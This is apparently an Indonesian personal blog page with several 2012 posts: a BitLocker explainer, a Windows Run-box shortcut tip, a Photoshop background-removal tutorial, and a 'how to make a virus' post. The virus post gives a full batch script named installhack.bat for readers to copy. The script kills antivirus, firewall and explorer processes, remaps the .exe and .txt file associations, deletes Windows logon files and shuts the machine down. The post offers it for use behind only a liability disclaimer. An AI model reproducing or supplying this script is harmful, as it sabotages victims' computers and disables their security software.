Kamis, 28 Juni 2012

Keamanan Windows

Keamanan pada windows

BitLocker beroperasi dalam tiga modus operasi. Dua modus pertama membutuhkan kepingan (chip) perangkat keras kriptografi yang disebut dengan Trusted Platform Module (TPM) versi 1.2 atau yang terbaru dan juga BIOS yang kompatibel, yakni sebagai berikut:

  • Modus operasi transparan: modus ini menggunakan sepenuhnya kemampuan perangkat keras TPM 1.2 untuk memberikan keamanan yang tinggidengan kenyamanan kepada pengguna–pengguna dapat masuk log ke Windows Vista secara normal, seolah tidak ada proses enkripsi berlangsung di dalamnya. Kunci yang digunakan untuk melakukan enkripsi akan dienkripsi dengan menggunakan chip TPM dan hanya akan dibuka kepada kode pemuat sistem operasi jika berkas-berkas yang dibutuhkan dalam rangka proses booting terlihat belum dimodifikasi. Komponen BitLocker sebelum OS berjalan ini mampu melakukannya dengan mengimplementasikan metodologi Static Root of Trust Measurement, yang didefinisikan oleh Trusted Computing Group.
  • Modus autentikasi pengguna: Modus ini mengharuskan pengguna memasukkan beberapa parameter autentikasi dalam lingkungan sebelum melakukan proses booting agar mampu melakukan proses booting ke sistem operasi. Modus ini memiliki dua metodologi, yakni dengan menggunakan Personal Identification Number (PIN) yang dimasukkan oleh pengguna, atau perangkat USB yang dimasukkan oleh pengguna yang mengandung kunci yang dibutuhkan.
  • Modus USB Key: Pengguna harus memasukkan perangkat USB yang mengandung kunci yang dibutuhkan agar komputer mampu melakukan booting terhadap sistem operasi yang dilindungi oleh BitLocker. Modus ini memang tidak membutuhkan TPM, tapi modus ini membutuhkan BIOS yang mampu membaca perangkat USB sebelum booting.

[sunting] Cara kerja

Berbeda dengan namanya, BitLocker Drive Encryption sebenarnya hanya merupakan sistem enkripsi terhadap sebuah volume/partisi saja. Sebuah volume mungkin bisa berupa satu hard drive, sebuah partisi, atau lebih dari satu buah hard drive. Dengan menggunakan alat bantu yang bersifat command-line, BitLocker dapat digunakan untuk mengamankan volume yang digunakan oleh sistem operasi, tetapi juga volume yang tidak dapat dienkripsi dengan menggunakan antarmuka grafisnya. Sistem operasi masa depan (mungkin Windows Server 2008) diharapkan dapat mendukung enkripsi terhadap volume tambahan selain volume booting dengan menggunakan antarmuka grafisnya. Selain itu, ketika diaktifkan, TPM dan BitLocker juga menjamin integritas jalur booting yang digunakan (BIOS, Master Boot Record, boot sector dan lain-lain) agar mencegah serangan fisik secara offline (offline attack), virus yang menyerang boot sector dan lain-lain.

Agar BitLocker dapat beroperasi, hard disk paling tidak harus memiliki dua buah volume yang harus diformat dengan menggunakan sistem berkas NTFS, yang dinamakan dengan “System Volume” (sebuah volume di mana sistem operasi mampu melakukan booting yang memiliki kapasitas paling tidak 1.5 Gigabyte) dan juga “Boot Volume“, yang mengandung Windows Vista. Perlu dicatat bahwa System Volume tidak dienkripsi, sehingga tidak boleh menyimpan data sensitif dan rahasia di sana. Tidak seperti versi Windows sebelumnya, alat bantu command-line diskpart bawaan Windows Vista mencakup kemampuan untuk mengecilkan ukuran volume NTFS sehingga system volume yang ditujukan untuk BitLocker pun dapat dibuat, tanpa harus melakukan repartisi hard drive.

Hanya volume yang berisi sistem operasi saja yang bisa dienkripsi dengan menggunakan antarmuka grafis. Akan tetapi, volume tambahan dapat dienkripsi dengan menggunakan skrip Windows Scripting Host, manage-bde.wsf. Fitur Encrypting File System (EFS) tetap disarankan sebagai solusi untuk enkripsi secara realtime dalam partisi NTFS. Penggunaan EFS juga sangat disarankan selain tentunya BitLocker, karena proteksi yang dilakukan oleh BitLocker akan berakhir mana kala kernel sistem operasi telah dimuat. Penggunaan dua fitur tersebut (BitLocker dan EFS) akan mampu melindungi beberapa jenis serangan.

Dalam lingkungan domain, BitLocker mendukung pembagian kunci terhadap dengan menggunakan Active Directory, selain tentunya antarmuka Windows Management Instrumentation (WMI) yang digunakan untuk melakukan administrasi jarak jauh terhadap fitur tersebut. Sebagai contoh penggunaan antarmuka WMI adalah skrip manage-bde.wsf (yang diletakkan di dalam \%WINDIR%\System32\) yang dapat digunakan untuk mengatur konfigurasi BitLocker dari command-line.

[sunting] Keamanan BitLocker

Menurut Microsoft, BitLocker tidak mengandung backdoor; tidak ada jalan lolos bagi para penegak hukum untuk mengakses data pengguna yang telah disimpan di dalam hard drive yang diproteksi dengan menggunakan BitLocker. Hal ini telah menjadi pembicaraan di antara para pengguna berpengalaman dan paham masalah sekuritas sejak awal pengumuman fitur enkripsi cakram terintegrasi di dalam Vista.

Menurut artikel “Keys to Protecting Data with BitLocker Drive Encryption” yang dipublikasikan pada bulan Juni 2007 dalam majalah TechNet Magazine[1], modus operasi transparan dan modus autentikasi pengguna akan menggunakan perangkat keras TPM untuk mendeteksi apakah ada perubahan yang tidak diinginkan terhadap lingkungan sebelum booting, termasuk di antarany adalah BIOS, MBR, dan boot sector. Jika ada perubahan yang tidak diinginkan terdeteksi oleh BitLocker, BitLocker akan meminta sebuah kunci pemulihan (recovery) dari sebuah perangkat USB, atau password untuk pemulihan yang dimasukkan secara manual. Dua cara ini digunakan untuk melakukan dekripsi terhadap Volume Master Key (VMK) dan mengizinkan proses booting untuk terus berlanjut.

Salah satu implikasi dari sistem enkripsi berbasis perangkat lunak semacam BitLocker adalah bahwa kunci pemulihan dan proses pemasukan password dapat ditipu dengan menggunakan manajer booting lainnya atau melakukan instalasi sebuah sistem operasi. Setelah perangkat lunak menemukan password rahasia, maka program tersebut dapat digunakan untuk melakukan dekripsi terhadap VMK, yang kemudian mengizinkan akses untuk melakukan dekripsi terhadap hard disk yang dienkripsi dengan BitLocker. Risiko ini dapat diproteksi dengan mengonfigurasikan password pada BIOS agar hanya mampu melakukan booting dari hard disk saja, bukan dari perangkat lain lalu melindungi konfigurasi BIOS dengan password yang kuat. Hal ini tidak menjadi jaminan kemanan, karena memang pada umumnya di dalam motherboard terkandung sebuah jumper untuk menghilangkan memori CMOS yang digunakan untuk menyimpan password dan konfigurasi BIOS, sehingga komputer pun dapat digunakan.

BitLocker juga dapat beroperasi dalam modus USB Key. Risiko keamanan dalam kasus ini adalah bahwa sebuah program (baik itu program sebelum booting atau program setelah booting) dapat membaca kunci startup dari USB key tersebut untuk disimpan di sebuah tempat lainnya yang dapat digunakan pada waktu yang akan datang untuk melakukan dekripsi terhadpa VMK untuk mengizinkan akses terhadap hard disk yang diamankan oleh BitLocker. Risiko ini dapat dikurangi dengan mencabut USB Key dari port USB sebelum Windows menyelesaikan proses bootingnya, yang akhirnya mencegah malware untuk mencuri informasi yang terkandung di dalam USB Key tersebut. Selain itu, mengonfigurasikan BIOS agar hanya melakukan booting dari hard disk dan melindunginya dengan password yang kuat akan meningkatkan keamanan dengan memperumit instalasi sebuah lingkungan sebelum booting yang mampu mencuri kunci. Lagi-lagi, jika memori CMOS dihapus, hal ini akan meningkatkan kerawanan sistem.

Meskipun BitLocker mampu melindungi hard disk dari beberapa macam serangan, BitLocker tidak mampu melindungi hard disk dari serangan yang dilancarkan dari jaringan, karena Windows sedang berjalan (mengingat keamanan BitLocker hanya efektif sesaat sebelum booting saja). Karenanya, penggunaan EFS sangatlah disarankan.

3 perintah dengan titik yang bermanfaat

3 Perintah Titik Yang Berguna
Semalam saya menemukan hal yang menarik (paling tidak bagi saya), saya chat dengan teman saya tentang perintah-perintah yang sering kami gunakan. Saya sering sekali menggunakan menu Run (Start -> Run atau Windows + R) untuk membuka atau ‘memerintah’ Windows melakukan keinginan saya. Ternyata semalam, saya menemukan 3 perintah menarik yang bisa dilakukan dengan karakter titik(.).
Langsung saja ya, ketiga perintah itu adalah: (O,ya perintah ini di ketikan di input Open di menu Run)
  1. Ketik satu titik [.] di kotak input (ketik tanpa tanda kurung) lalu tekan Enter, Anda akan mendapatkan folder User Profile anda terbuka.
  2. Ketika dua titik [..] di kotak input (ketik tanpa tanda kurung) lalu tekan Enter, Anda akan mendapatkan folder Documents and Settings terbuka.
  3. Ketik tiga titik [...] di kotak input (ketik tanpa tanda kurung) lalu tekan Enter, Anda akan mendapatkan My Computer terbuka.
Semoga bisa bermanfaat juga buat rekan-rekan.

Rabu, 13 Juni 2012

Membuat Virus

Cara Membuat Virus Installhack.bat

18 Mar

Catatan ini diperoleh dari : http://www.get2ware.co.cc/2010/05/cara-sederhana-membuat-virus-komputer.html

Virus komputer adalah sebuah program komputer yang dapat menyalin sendiri atau menggandakan dirinya sendiri dan menginfeksi system komputer yang secara umum bersifat merusak. Tetapi, taukah kamu bahwa virus komputer itu dapat dibuat secara sederhana, tulisan dibawah ini merupakan salah satu cara membuat virus komputer dengan cara yang sangat sederhana. Tetapi sebelum kamu membaca dan mempraktekkan tulisan tersebut perlu dipahami bahwa postingan ini hanya bersifat menambah pengetahuan kamu bukan sebagai hal yang berdampak negatif dan apapun yang terjadi setelah mempraktekkan tulisan dibawah ini, saya terlepas dari dampak yang terjadi..

Cara Mudah Membuat Virus. Check it out :D

Virus ini Dapan Menyerang 1. Menhapus, NAVAPSVC.exe
2. Menhapus, Explorer.exe (taskbar dan ikon akan hilang)
3. Menhapus, zonelabs.exe
4. mengubah asosiasi file exe menjadi txt (ketika membuka file exe, akan pergi ke notepad)
5. mengubah asosiasi file txt menjadi mp3 (ketika membuka file txt, maka akan terbuka WinAmp atau multimedia player)
6. Menghapus Login / Logoff Screens

Caranya, copy kode di bawah ini lalu paste pada Notepad.

title virus is my dna
color 0A
@echo off
set end=md “u cant eascape from me-vishnu”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * andhra pradesh- virus created in karimnagar from jits college
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
cls
msg * hi dude this is begining.
msg * vishnu attcked the system try to challenge him .
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

Simpan di C: dengan nama installhack.bat
Selesai

Catatan ini diperoleh dari : http://www.get2ware.co.cc/2010/05/cara-sederhana-membuat-virus-komputer.html

Selasa, 05 Juni 2012

Cara memisahkan gambar dengan background pada photoshop

Cara Memisahkan Objek dan Background pada gambar dengan Plugin Azlect

Tutorial photoshop ini sama dengan tutorial yang pernah saya buat tentang pemisahan background dengan extract bedanya kali ini menggunakan Plugin .. hehe.. lebih gampang dan cepat!

Download dulu Plugin nya di Member Area.. atau yang belum jadi member silahkan cari di google.. ada kok kalo jeli. :D

Cara install nya ada juga kok.. jadi download, Install trus pake :)

Buka gambar yang mau diedit.. saya pake gambar Steven Gerrard .. Gelandang hebat liverpool itu loh ! hehehe

steven gerrard

Duplikat layer background dengan menekan CTRL + J

Sekarang buka Plugin Ezlect nya di Filter > Ezlect > Ezlect extract

Ini Jendela Ezlect nya , toolnya cuman dikit kok jadi mudah dipelajari

steven gerrard

Klik Di Object nya ( Steven Gerrard nya) dengan Penanda Object dan Klik di background oleh penanda background.. penampakannya kayak gini nih

steven gerrard

Penanda Objek ditandai dengan gambar kotak kecil kalo penanda background ditandai dengan tanda x

Klik Show mask Image untuk melihat hasilnya… kalo kurang bagus bisa dicoba .. klik lagi Show selection edge (letaknya disamping show mask image)

( tool lain nya di dalam ezlect silahkan di pelajari sendiri .. gampang banget kok)

Kalo sudah beres klik Ok ..

background di layer 1 sudah hilang…

Ini sebenernya sudah beres pekerjaan plugin Azlect..

Sekarang tinggal menggunakan gambar hasil pemisahan background tersebut.. terserah mau diapain.. hehehe

steven gerrard

Saya beri background aja deh yaa sebagai contoh nya…

buat layer baru di bawah layer 1

terus warnai dengan warna merah

Sekarang klik 2x layer 1 untuk memunculkan Blending Options

Klik Ok…

Beri text atau gambar tambahan … jadinya seperti ini :

steven gerrard

Selamat Mencoba !

Artikel Cara Memisahkan Objek dan Background pada gambar dengan Plugin Azlect ini dipersembahkan oleh Tutorial Photoshop Gratis. Kunjungi Wallpaper, Font, Desktop Theme Gratis Pokoknya Serba Gratis. Baca Juga Adobe Photoshop Tutorials